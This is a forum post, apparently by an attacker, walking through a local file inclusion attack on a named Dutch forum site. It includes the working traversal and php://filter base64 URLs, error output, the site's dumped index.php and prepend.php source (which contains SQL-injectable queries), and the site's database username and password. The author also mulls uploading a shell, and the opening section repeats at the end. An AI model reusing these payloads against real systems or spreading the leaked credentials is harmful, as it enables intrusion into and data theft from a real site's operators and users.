Server_CM
12-02-2014, 11:33 AM
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: Failed opening '../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
------------------------------
URL THAT TRIGGERED ERROR
------------------------------
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
========================================
Now We See what we can do here
1.)http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
=========================================
2.)base 64 encoded response
---------------------------------
PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj 0kX0dFVFsnbG9naW4nXTsKPz4KPCFET0NUWVBFIGh0bWwgUFVC TElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbm FsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9E VEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bW xucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+Cjxo ZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIG NvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4K PG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbnRlbnQgPSAid2 lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiBy ZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgo8IS 0tW2lmIElFIDZdPiA8bGluayBocmVmPSJzdGlqbDEuY3NzIiBy ZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj48IVtlbm RpZl0tLT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVm PSIvZmF2aWNvbi5pY28iIC8+Cjx0aXRsZT5taXN0ZmxhcmQ8L3 RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIg c3JjPSJtZDUuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IGxhbmd1YW dlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gcGFzc1Jlc3BvbnNl KCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9naW 4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51 c2VyLnZhbHVlIAogIC8vZG9jdW1lbnQuaGZvcm0ucGFzcy52YW x1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2dpbi5w YXNzX3RlbXAudmFsdWU7CmRvY3VtZW50LmxvZ2luLnBhc3NfdG VtcC52YWx1ZSA9ICIiOwp3YWNodDE9TUQ1KHBhc3MpLnRvTG93 ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhPW1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/PjsgCndhY2h0Mj1NRDUoYnVmZikudG9Mb3dlckNhc2UoKTsKZG 9jdW1lbnQuaGZvcm0udXNlci52YWx1ZT11c2VyX2VsZW1lbnQ7 CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0Mj sKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hv ICRwYXJhOyA/PjsKZG9jdW1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcH Q+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaWQ9Ik1haW4iPgo8ZGl2 IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaW YgKCRfU0VTU0lPTlsndXNlciddPT1udWxsKQp7CmlmICgkbG9n aW49PTEpIGVjaG8gIjxhIGhyZWY9J2luZGV4LnBocD9wYWdlPW hvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGlt ZyBzcmM9J2ltYWdlcy9rbm9weS5naWYnIGFsdD0ndWl0JyBzdH lsZT0nYm9yZGVyOjAnLz48L2E+IjsgZWxzZSBlY2hvICI8YSBo cmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5waHAmbG9naW49MScgPjxpbW cgc3JjPSdpbWFnZXMva25vcHguZ2lmJyBhbHQ9J2Fhbicgc3R5 bGU9J2JvcmRlcjowJy8+PC9hPiI7CmlmICgkbG9naW4hPTEpCn sKaW5jbHVkZSAiY29udHJvbGUucGhwIjsKZWNobyAiPHRhYmxl Pjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC90ZD 48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRy Pjxmb3JtIGFjdGlvbj0nbG9naW4ucGhwJyBtZXRob2Q9J3Bvc3 QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFt ZT0ndXNlcm5hbWUnIHZhbHVlPScnIHN0eWxlPSd3aWR0aDo4N3 B4O2hlaWdodDoxMnB4O2ZvbnQtc2l6ZToxMXB4Jy8+PC90ZD4i OwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J3Bhc3N3b3JkJyBuYW 1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3 cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD 4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFt ZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPH RkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1 dHRvbicgdmFsdWU9J2xvZ2luJyBjbGFzcz0na25vcDEnLz48L3 RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAn PGZvcm0gbmFtZT0ibG9naW4iPic7CmVjaG8gJzx0YWJsZT48dH I+PHRkPmdlYnJ1aWtlcnNuYWFtOjwvdGQ+PHRkPndhY2h0d29v cmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT 0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHls ZT0nd2lkdGg6ODdweDtoZWlnaHQ6MTJweDtmb250LXNpemU6MT FweCcgLz48L3RkPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0n cGFzc3dvcmQnIG5hbWU9J3Bhc3NfdGVtcCcgdmFsdWU9Jycgc3 R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXpl OjExcHgnIC8+PC90ZD4iOwplY2hvICc8dGQ+PGlucHV0IG9uQ2 xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0 eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9Ik xvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI+PC90ZD4nOwpl Y2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2 dpbnZlaWxpZy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZv cm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbW U9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4i IG5hbWU9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT 0iaGlkZGVuIiBuYW1lPSJjb2RlIj4nOwplY2hvICc8L2Zvcm0+ JzsKfQp9IGVsc2UKewplY2hvICI8aW1nIHNyYz0naW1hZ2VzL2 tub3B6LmdpZicgYWx0PScnIHN0eWxlPSdib3JkZXI6MCcvPjwv YT4iOwokdXNlcj0kX1NFU1NJT05bJ3VzZXInXTsKZWNobyAiPH RhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdXNl ciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPj x0ZD48Zm9ybSBhY3Rpb249J2xvZ3VpdC5waHAnIG1ldGhvZD0n cG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3ViMm EnIHZhbHVlPSdsb2d1aXQnIGNsYXNzPSdrbm9wMScgdGl0bGU9 J3VpdGxvZ2dlbicvPiI7CmVjaG8gIjwvZm9ybT48L3RkPiI7IC AgLy8oPGEgaHJlZj0ibG9ndWl0LnBocCI+TG9ndWl0PC9hPikK IAp9CmlmICgoJF9TRVNTSU9OWyd1c2VyJ109PW51bGwpICYmIC gkbG9naW4hPTEpKQp7CmVjaG8gIjxmb3JtIGFjdGlvbj0naW5k ZXgucGhwP3BhZ2U9cGhwL2ZvcnVtL21lbGRhYW4ucGhwJyBtZX Rob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0n c3VibWl0JyBuYW1lPSdzdWJtaXRCdXR0b24nIHZhbHVlPSdpbn NjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPC90 ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC 5waHA/cGFnZT1waHAvZm9ydW0vdmVyZ2V0ZW4ucGhwJyBtZXRob2Q9J3 Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0 JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub3AwJy B0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hv ICI8L3RkPjwvZm9ybT4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MS kKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnBocD9wYWdl PXBocC9mb3J1bS9zY2hyaWpmdWl0LnBocCcgbWV0aG9kPSdwb3 N0Jz4iOyBlY2hvIjx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwv dGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG 5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZl bicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cG U9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0nIHZhbHVlPVwiJHVz ZXJcIj4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwogaWYgKCR1c2 VyPT0nYWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdp bmRleC5waHA/cGFnZT1waHAvZm9ydW0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG 9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdz dWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2 xhc3M9J2tub3AwJyB0aXRsZT0nSW5zdGVsbGluZ2VuJy8+IjsK IGVjaG8gIjwvdGQ+PC9mb3JtPiI7CiB9CiAKfSBlY2hvICI8L3 RyPjwvdGFibGU+PC9kaXY+IjsgLy8gZWluZGUgbG9naW4KJHZv cm0xPScnOyR2b3JtMj0nJzskdm9ybTM9Jyc7JHZvcm00PScnOy R2b3JtNT0nJzskdm9ybTY9Jyc7CmlmIChpc3NldCgkX0dFVFsn cGFnZSddKSkKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKZW xzZSAkcGFnZSA9ICJpbmxlaWRpbmcucGhwIjsgCmlmICgkcGFn ZT09ImlubGVpZGluZy5waHAiKSAgIHskdm9ybTE9J2Jsb2snO3 0gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAi KXskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob2 1lLnBocCIpICAgICAgICB7JHZvcm0yPSdibG9rJzt9IGVsc2UK aWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3JtMz 0nYmxvayc7fSBlbHNlCmlmICgkcGFnZT09ImZvcnVtcmVnZWxz LnBocCIpIHskdm9ybTQ9J2Jsb2snO30gZWxzZQppZiAoKCRwYW dlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZm9ybS5w aHAiKSB8fCAoJHBhZ2U9PSJtYWlsLnBocCIpICkgeyR2b3JtNT 0nYmxvayc7fSBlbHNlIHskdm9ybTI9J2Jsb2snOyB9Cj8+Cjwv ZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiBjbGFzcz0ibW VudSI+CiA8ZGl2IGNsYXNzPSJob3Zlcm1lbnUiPgogPHVsPgog PGxpIGlkPSI8P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZW Y9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZy5waHAiIHRpdGxl PSJJbmxlaWRpbmciPjxzcGFuPklubGVpZGluZzwvc3Bhbj48L2 E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+ Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCIgdGl0bGU9IkZvcnVtIj48c3Bhbj5Gb3 J1bTwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNo byAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPl RvZWxpY2h0aW5nPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8 P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4Ln BocD9wYWdlPWZvcnVtcmVnZWxzLnBocCIgdGl0bGU9IiI+PHNw YW4+Rm9ydW0gcmVnZWxzPC9zcGFuPjwvYT48L2xpPgogPGxpIG lkPSI8P3BocCBlY2hvICR2b3JtNTsgPz4iPjxhIGhyZWY9Imlu ZGV4LnBocD9wYWdlPWNvbnRhY3QucGhwIiB0aXRsZT0iIj48c3 Bhbj5Db250YWN0PC9zcGFuPjwvYT48L2xpPgogPC91bD4KPC9k aXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0tIHZvb3 IgSUUgNiAtLT48L2Rpdj4KPD9waHAKaWYgKGlzc2V0KCRfR0VU WydwYWdlJ10pKQogICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOw plbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiOyAKPz4KPD9w aHAKZWNobyI8ZGl2IGlkPSdDb250ZW50Jz4iOwppZiAoKCRwYW dlPT0iaW5sZWlkaW5nYWRtaW4ucGhwIikgJiYgKCRfU0VTU0lP TlsndXNlciddIT1udWxsKSkgJHBhZ2U9ImlubGVpZGluZy5waH AiOwppbmNsdWRlICRwYWdlOyAKZWNobyAiPC9kaXY+IjsgLypl aW5kZSBjb250ZW50ICovCj8+CjxkaXYgaWQ9IlZvZXQiPgo8P3 BocApzZXRsb2NhbGUoTENfVElNRSwnbmxfTkwnLCdubCcsJ2R1 Jyk7CmVjaG8gIjxkaXYgc3R5bGU9J21hcmdpbi1sZWZ0OjYwMH B4O21hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5k OiAnLCBzdHJmdGltZSgiJUg6JU06JVMgJUEgJWQgJUIgJVkiLC Bta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4g PCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC 9qYXZhc2NyaXB0Ij4KdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6 IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaH R0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVu dC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIG dhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpz JyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdC UzRSIpKTsKPC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9q YXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYWNrZXIgPSBfZ2 F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VU cmFja2VyLl90cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKS B7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9odG1s
-------------------------------------
Decoded Response
------------------------------------
<?php
require "prepend.php";
$login=$_GET['login'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name = "viewport" content = "width=1024" />
<link href="stijl.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]-->
<link rel="shortcut icon" href="/favicon.ico" />
<title>mistflard</title>
<script type="text/javascript" src="md5.js"></script>
<script language="javascript">
function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value
//document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";
<?php $para=microtime(1)*1000; ?>
buff=wacht1+<?php echo $para; ?>;
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=<?php echo $para; ?>;
document.hform.submit();
}
</script>
</head>
<body>
<div id="Main">
<div id="Hoofd">
<div id="login">
<?php
if ($_SESSION['user']==null)
{
if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>"; else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>";
if ($login!=1)
{
include "controle.php";
echo "<table><tr>";
echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>";
echo "<tr><form action='login.php' method='post'>";
echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>";
echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='hidden' name='code' value=$para ></td>";
echo "<td><input type='submit' name='submitButton' value='login' class='knop1'/></td>";
echo "</form> ";
} else
{
echo '<form name="login">';
echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>';
echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo '<td><input onClick="passResponse(); return false;" type="submit" name="submitbtn" value="Login veilig" class="knop2"></td>';
echo '</form>';
echo '<form action="loginveilig.php" METHOD="POST" name="hform">';
echo '<input type="hidden" name="user">';
echo '<input type="hidden" name="password">';
echo '<input type="hidden" name="code">';
echo '</form>';
}
} else
{
echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>";
$user=$_SESSION['user'];
echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>";
echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>";
echo "</form></td>"; //(<a href="loguit.php">Loguit</a>)
}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>";
echo "<td><input type='submit' name='submitButton' value='inschrijven' class='knop2'/>";
echo "</td></form>";
echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>";
echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>";
echo "</td></form>";
} else if ($login!=1)
{
echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>"; echo"<td style='width:128px'></td>";
echo "<td><input type='submit' name='submitButton' value='uitschrijven' class='knop2'/>";
echo "<input type='hidden' name='usernaam' value=\"$user\">";
echo "</td></form>";
if ($user=='admin')
{
echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>";
echo "<td><input type='submit' name='substelin' value='In.' class='knop0' title='Instellingen'/>";
echo "</td></form>";
}
} echo "</tr></table></div>"; // einde login
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5=''; $vorm6='';
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php") {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php") {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
</div> <!--einde Hoofd-->
<div class="menu">
<div class="hovermenu">
<ul>
<li id="<?php echo $vorm1; ?>"><a href="index.php?page=inleiding.php" title="Inleiding"><span>Inleiding</span></a></li>
<li id="<?php echo $vorm2; ?>"><a href="index.php?page=home.php" title="Forum"><span>Forum</span></a></li>
<li id="<?php echo $vorm3; ?>"><a href="index.php?page=toelichting.php" title=""><span>Toelichting</span></a></li>
<li id="<?php echo $vorm4; ?>"><a href="index.php?page=forumregels.php" title=""><span>Forum regels</span></a></li>
<li id="<?php echo $vorm5; ?>"><a href="index.php?page=contact.php" title=""><span>Contact</span></a></li>
</ul>
</div>
</div>
<div class="balk"><!-- voor IE 6 --></div>
<?php
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
?>
<?php
echo"<div id='Content'>";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "</div>"; /*einde content */
?>
<div id="Voet">
<?php
setlocale(LC_TIME,'nl_NL','nl','du');
echo "<div style='margin-left:600px;margin-top:10px;'>".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'</div>';
?>
</div>
</div> <!--einde main-->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}
</script>
</body>
</html
-------------------------------------------------------------------
4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect
so i highly doubt we can upload a shell via proc/self/environ but we can try hold. nah didnt thnk so lets try this
5.)i grab prepend.php and decode its contents as well using opionated geeks base 64 decoder online and get the following
-----------------------------------------------
prepend.php
-----------------------------------------------
<?php
session_start();
require_once "MyDB.class.php";
require_once "php/login/versio.inc.php";
function check_ip($ip)
{
$mydb= new MyDB();
$sql="SELECT * FROM blokkeer Where ip='$ip'";
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) == 0) return true; else
{
$vandaag=date("Y-m-d");
$line = $mydb->fetch($result);
$datum=$line[2];
$reden=$line[4];
setlocale(LC_TIME,'nl_NL','nl','du');
$refa1=strpos($datum,'-');
$refa2=strripos($datum,'-');
$jaarA=substr($datum,0,$refa1);
$dagA=substr($datum,($refa2+1),2);
$maandA=substr($datum,($refa1+1),2);
$dat=strftime("%A %d %B %Y", mktime(0, 0, 0, $maandA, $dagA, $jaarA));
if ($datum>$vandaag) {echo "De toegang tot deze functie is u ontzegd, IP-adres geblokkeerd tot ".$dat;
if (($reden!='') && ($reden!=null)) echo "<br>wegens: ".$reden;
echo '<br><br>Keer terug naar de begin pagina.';
echo '<table><tr></tr><tr>';
echo '<form action="index.php?page=home.php" method="post">';
echo '<td><input type="submit" value="OK" class="verstuur"></td>';
echo '</form></tr></table>';
return false;}
else return true;
}
}
function check_mail($user)
{
$mydb= new MyDB();
$sql="SELECT veri FROM WebUser Where username='$user'";
$result=$mydb->doQuery($sql);
$line = $mydb->fetch($result);
if ($line[0] == 1) return true; else return false;
}
function check_auth_user3($user,$authorization) // nieuwe functie met extra controles
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false; // sessieid voldoet niet
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {echo "Geen toegang: Sessionid klopt niet.<br>".$_SESSION['session_id']."<br>".$sessionid."<br>". $_SESSION['error_message']."<br>"; return false;}
if (($sw) && ($ip==$ipref)) $sx=true; else {echo "Geen toegang: Inlog-IP-adres verschilt van huidig IP-adres.<br>"; return false;} // username voldoet niet
}
else {echo "Geen toegang: Log eerst in a.u.b.<br>"; return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {echo "U bent niet geautoriseerd om deze pagina te openen.<br>"; return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user4($user,$authorization) // nieuwe functie met extra controles zelfde functie als 3 maar dan zonder tekstmelding
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false;
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user5($user,$session,$authorization) //functie voor aparte controle om na verloop sessie toch nog geldige submit te kunnen doen.
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($session); $sw=false;
if ( ($sessionid==$session) && ($len==50) ) {$sw=true; echo "Check_auth_user5 succesvol uitgevoerd<br>";} else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
?
-----------------------------------------------
6.)fuck that wasnt eas but here guys these assholes are smart sort of
====================
login info
====================
<?php
define(HOST, "localhost");
define(USERNAME,"jthkrgfw_beheer");
define(PASSWORD,"w15129");
define(DATABASE,"jthkrgfw_mistflard");
?>
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: Failed opening '../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
------------------------------
URL THAT TRIGGERED ERROR
------------------------------
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
========================================
Now We See what we can do here
1.)http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
=========================================
2.)base 64 encoded response
---------------------------------
